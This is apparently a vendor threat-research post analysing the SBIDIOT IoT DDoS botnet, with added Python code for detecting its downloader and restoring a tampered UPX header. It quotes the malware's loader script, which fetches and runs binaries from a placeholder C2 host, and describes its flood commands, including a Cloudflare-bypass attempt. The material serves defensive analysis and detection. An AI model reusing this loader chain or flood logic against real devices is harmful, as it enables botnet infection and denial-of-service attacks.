There are billions of IoT connections in the world and more than 70 percent of them are in the industrial sector. This is why Nozomi Networks Labs regularly reviews the threat landscape for IoT devices. Recently, a malware sample named SBIDIOT caught our attention. It had a relatively low number of detections on VirusTotal and its commands, in the current form, were not well documented by the cybersecurity community.
We decided to analyze SBIDIOT and uncovered how it communicates with targets and what types of commands it supports. This information helps detect the threat and allows defenders to stop or mitigate it before harmful impacts occur. The main potential impact of DDoS (Distributed Denial of Service) botnets is the generation of excessively high loads on targeted servers, preventing users from accessing services and thus harming normal business operations.
To avoid impacts, early detection is vital. Detection can be done by your security team (see the malware indicators at the end of this article) or by using a network monitoring and threat intelligence solution such as ours.
Analysis of SBIDIOT Malware
Based on our information, at least one way that the malware propagates is by exploiting an RCE vulnerability in ZTE routers. For older versions, we observed a shell script named sh which, once delivered to the victim machines by various means, downloads and executes the binary payloads:
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://<cnc_ip>/SBIDIOT/x86; curl -O http://<cnc_ip>/SBIDIOT/x86;cat x86 >SSH;chmod +x *;./SSH SSH
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://<cnc_ip>/SBIDIOT/mips; curl -O http://<cnc_ip>/SBIDIOT/mips;cat mips >SSH;chmod +x *;./SSH SSH
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://<cnc_ip>/SBIDIOT/mpsl; curl -O http://<cnc_ip>/SBIDIOT/mpsl;cat mpsl >SSH;chmod +x *;./SSH SSH
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://<cnc_ip>/SBIDIOT/arm; curl -O http://<cnc_ip>/SBIDIOT/arm;cat arm >SSH;chmod +x *;./SSH SSH
...
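The loader script above is a useful detection source on its own: the payload paths, the loader chain and the root-level sh script are all fixed. The following Python is an added example (not Nozomi Networks' code) that flags those markers in web-proxy log lines and in captured shell scripts. The proxy-log layout and the IP addresses are constructed for the demo; the architecture list comes from the quoted script and should be extended as further payload names are observed.

```python
"""Flag SBIDIOT-style downloader activity in proxy logs and shell scripts.

Added example, not Nozomi Networks' code. Every marker is taken from the
loader script quoted above: the /SBIDIOT/<arch> payload paths, the sh script
served from the server root, and the fixed
'wget; curl -O; cat <arch> >SSH; chmod +x *; ./SSH SSH' chain.
The proxy-log format and all IP addresses below are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Payload names seen in the quoted script; the article truncates it ("..."),
# so extend this set as further architectures are observed.
KNOWN_ARCHS = {"x86", "mips", "mpsl", "arm"}
PAYLOAD_RE = re.compile(r"^/SBIDIOT/(?P<arch>[A-Za-z0-9_]+)$")
ROOT_SCRIPT = "/sh"  # the loader script is served from the server root

# Assumed proxy-log layout: "<timestamp> <client_ip> <server_ip> <method> <url>"
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


@dataclass(frozen=True)
class Hit:
    ts: str
    client: str
    server: str
    artefact: str    # "x86", "mips", ... or "sh"
    confidence: str  # "high": known arch, "medium": unseen arch, "low": "/sh" only


def scan_proxy_log(lines: list[str]) -> list[Hit]:
    """Return one Hit per request for a payload path or for the root sh script."""
    hits: list[Hit] = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts, client, server, _method, url = m.groups()
        path = urlparse(url).path
        pm = PAYLOAD_RE.match(path)
        if pm:
            arch = pm["arch"]
            hits.append(Hit(ts, client, server, arch,
                            "high" if arch in KNOWN_ARCHS else "medium"))
        elif path == ROOT_SCRIPT:
            # "/sh" on its own is a weak signal; correlate it with payload fetches.
            hits.append(Hit(ts, client, server, "sh", "low"))
    return hits


# One iteration of the loader chain; \1 ties 'cat <arch>' to the arch in the URL.
CHAIN_RE = re.compile(
    r"(?:wget|curl -O)\s+\S+/SBIDIOT/(\w+)\s*;.*?cat \1 >SSH;\s*chmod \+x \*;\s*\./SSH SSH"
)


def downloader_archs(script: str) -> list[str]:
    """Architectures for which the script runs the complete SBIDIOT loader chain."""
    return [m.group(1) for m in CHAIN_RE.finditer(script)]


# Constructed sample data.
SAMPLE_LOG = [
    "2021-04-10T12:00:01Z 10.0.0.5 192.0.2.10 GET http://192.0.2.10/SBIDIOT/x86",
    "2021-04-10T12:00:02Z 10.0.0.5 192.0.2.10 GET http://192.0.2.10/SBIDIOT/mips",
    "2021-04-10T12:00:03Z 10.0.0.7 198.51.100.4 GET http://198.51.100.4/firmware/update.bin",
    "2021-04-10T12:00:04Z 10.0.0.5 192.0.2.10 GET http://192.0.2.10/sh",
]
SAMPLE_SCRIPT = """#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://<cnc_ip>/SBIDIOT/x86; curl -O http://<cnc_ip>/SBIDIOT/x86;cat x86 >SSH;chmod +x *;./SSH SSH
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://<cnc_ip>/SBIDIOT/mips; curl -O http://<cnc_ip>/SBIDIOT/mips;cat mips >SSH;chmod +x *;./SSH SSH
"""

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
    print("loader chain found for:", downloader_archs(SAMPLE_SCRIPT))
```

The chain regex deliberately requires the whole sequence, including the `cat <arch> >SSH` rename and the `./SSH SSH` launch, so an ordinary `wget` of a firmware image does not trip it; the proxy-log scan keeps `/sh` as a low-confidence hit that only becomes interesting next to a `/SBIDIOT/<arch>` fetch from the same client.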
The sample e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 is packed with the standard UPX tool, but the UPX header was later modified. While the malware remains executable, it can no longer be unpacked with the same tool straight away:
$ file e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
$ upx -d e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: NotPackedException: not packed by UPX

Unpacked 0 files.
As we can see here, the UPX! signature was replaced with a custom one (the bytes YTS\x99, as the perl substitution below shows). Restoring it enables us to unpack the sample using the standard UPX tool:
$ perl -pi -e 's/YTS\x99/UPX!/g' e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
$ upx -d e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     55372 <-     30024   54.22%   linux/i386   e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9

Unpacked 1 file.
$ file e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
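The perl one-liner does a blind global substitution. The Python below is an added example (not Nozomi Networks' code) of the same repair with the checks an analyst would want around it: it refuses non-ELF input, requires the replacement to be exactly four bytes, expects the custom marker to occur at least twice (an assumption about UPX's ELF layout: the magic sits in the l_info block near the ELF header and again in the PackHeader trailer), and reports the offsets it patched. It also adds a heuristic for finding such samples in the first place, based on the assumption that the UPX ELF stub keeps its "$Info: ... UPX ..." banner even when the magic is overwritten. The sample bytes are constructed and are not an executable.

```python
"""Restore a tampered UPX magic so the stock 'upx -d' works again.

Added example, not Nozomi Networks' code. See the lead-in for the layout
and banner assumptions this relies on.
"""
from __future__ import annotations

UPX_MAGIC = b"UPX!"
ELF_MAGIC = b"\x7fELF"
# Heuristic markers (assumption): strings the UPX ELF stub carries regardless
# of whether the 4-byte magic has been overwritten.
STUB_MARKERS = (b"$Info: This file is packed with the UPX executable packer", b"$Id: UPX")


def looks_upx_packed(data: bytes) -> bool:
    """True for an ELF image that still carries the UPX stub banner,
    whether or not the 'UPX!' magic is intact."""
    return data.startswith(ELF_MAGIC) and any(m in data for m in STUB_MARKERS)


def find_all(data: bytes, needle: bytes) -> list[int]:
    """Offsets of every occurrence of needle in data."""
    offsets, pos = [], data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets


def restore_upx_magic(data: bytes, custom_sig: bytes) -> tuple[bytes, list[int]]:
    """Replace every occurrence of custom_sig with 'UPX!'.

    Returns the patched image and the offsets that were rewritten. An image
    whose magic is already intact is returned unchanged with an empty list.
    """
    if not data.startswith(ELF_MAGIC):
        raise ValueError("not an ELF image")
    if len(custom_sig) != len(UPX_MAGIC):
        raise ValueError("the UPX magic field is 4 bytes; the replacement must be too")
    if UPX_MAGIC in data:
        return data, []
    offsets = find_all(data, custom_sig)
    # Assumption: UPX writes the magic in l_info near the ELF header and in the
    # PackHeader trailer, so fewer than two hits means custom_sig is not the
    # marker the packer actually replaced.
    if len(offsets) < 2:
        raise ValueError(f"{custom_sig!r} found {len(offsets)} time(s); expected at least 2")
    return data.replace(custom_sig, UPX_MAGIC), offsets


def build_tampered_sample() -> bytes:
    """Constructed stand-in for the real sample: an ELF-looking blob whose two
    UPX magic fields carry the YTS\\x99 bytes from the article. Not executable."""
    banner = b"$Info: This file is packed with the UPX executable packer http://upx.sf.net $\n"
    return (ELF_MAGIC + b"\x00" * 0x70       # stand-in for ELF header and program headers
            + b"YTS\x99" + b"\x00" * 8      # tampered l_info magic
            + banner + b"\x00" * 64         # stub banner plus "compressed" filler
            + b"YTS\x99" + b"\x00" * 32)    # tampered PackHeader trailer


if __name__ == "__main__":
    sample = build_tampered_sample()
    print("looks UPX-packed:", looks_upx_packed(sample))
    patched, where = restore_upx_magic(sample, b"YTS\x99")
    print("patched offsets:", where, "magic count now:", patched.count(UPX_MAGIC))
```

Run `upx -d` on the written-out result exactly as in the article; if UPX still reports NotPackedException after the magic is restored, the sample was tampered with beyond the signature (for instance in the PackHeader checksum) and needs a manual unpack.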
The analysis reveals characteristics quite common for this type of threat. There is a strong focus on DDoS with some parts of the code shared with other malware families like Gafgyt.
Given that the sample is statically linked and stripped, which is almost always the case with malware targeting IoT, the next step was to load FLIRT signatures for uClibc to make analysis easier. uClibc is a compact C library common on Linux-based embedded devices, and IoT malware developers favor it because it eases cross-compilation, a practice popularized by Mirai. FLIRT signatures are essentially a method that reverse engineering tools like IDA use to pattern-match known library functions, which can greatly speed up the analysis process.
Upon execution, the sample attempts to connect to its C2, which in this case is an IP address and port hard-coded into the binary. Although the C2 infrastructure was not operational during the time of the investigation, we were able to force the sample to talk to our own server as its C2. Coupled with some static analysis, this was enough to quickly figure out the protocol and begin interaction.
The function responsible for handling commands compares each command received from C2 with one of the following strings:
Then, based on the results, it performs several validation checks on its arguments before executing the actual command.
Commands Supported by SBIDIOT
The TCP command asks the bot to send TCP segments destined for a specified host/port combination for a specified interval of time. Additionally, it allows the operator to set a number of optional TCP flags.
The HTTP flooding function takes as arguments an HTTP method, a host/port combination, an attack duration and a request count specifying how many times to repeat the operation. Until either the attack duration or the request count is exceeded, it keeps performing HTTP requests with the settings provided and a randomly selected user-agent string.
Additionally, another function is called to perform HTTP requests to the /cdn-cgi/l/chk_captcha URI of a hostname/port combo with, once again, a configurable attack duration and request count. This is done in an attempt to circumvent CloudFlare protection mechanisms.
Another DDoS command employs either UDP or RAW sockets, depending on the arguments provided. Again, arguments for the target and attack duration can be given, and additionally the attacker can specify a pause interval between packets delivered to the target. Variants of Gafgyt and other IoT malware occasionally include a VSE command to target servers running the Valve Source Engine.
The VOX command takes a host, a port and an attack duration as its arguments and then sends UDP datagrams with one of three randomly selected hard-coded payloads.
The sample sends UDP payloads to a target host, with the port, the attack duration and the maximum size of the generated payload given as arguments. The actual payload may be smaller than requested because its size is computed with the strlen function, which counts bytes only up to the first null byte.
HEX / STD / R6 / NFO / FN / OVHKILL / NFOKILL / UDPH
All of the above commands call the same function, which receives a host name, a port and an attack duration, then starts generating UDP traffic with a fixed payload.
This command sends a SIGKILL signal to all process IDs the bot is currently tracking, giving the operator the ability to stop any of the process's children.
Threat Intelligence is Needed to Defend Industrial Systems from IoT Malware
As the number of Internet-connected devices increases at a rate of more than 130 percent a year [1], the threat landscape also rapidly evolves. New families of malware and modifications of existing ones emerge regularly. And, regardless of their complexity and sophistication, they all pose a threat.
To defend against threats to IoT devices that could impact production, uptime and possibly safety, automated tools can help. OT/IoT network monitoring paired with regularly updated threat intelligence identifies indicators of compromise and anomalous behavior, giving you the opportunity to act before harm occurs.
Nozomi Networks Labs is committed to providing real-time information on IoT threats as they continue to increase in prevalence and significance for operational technology environments – stay tuned for ongoing updates.
For indicators of SBIDIOT malware, see the information provided at the end of this page.
- [1] “The Internet of Things: Consumer, Industrial & Public Services 2020-2024,” Juniper Networks, March 31, 2020.
SBIDIOT Malware Indicators
As with most modern IoT malware families, there are multiple other URLs associated with the same C&C delivering payloads compiled for other architectures:
Other C&C IP addresses seen in 2021:
Other commonly used filenames:
- sh (located in the root directory rather than in the SBIDIOT subdirectory like the rest of the samples)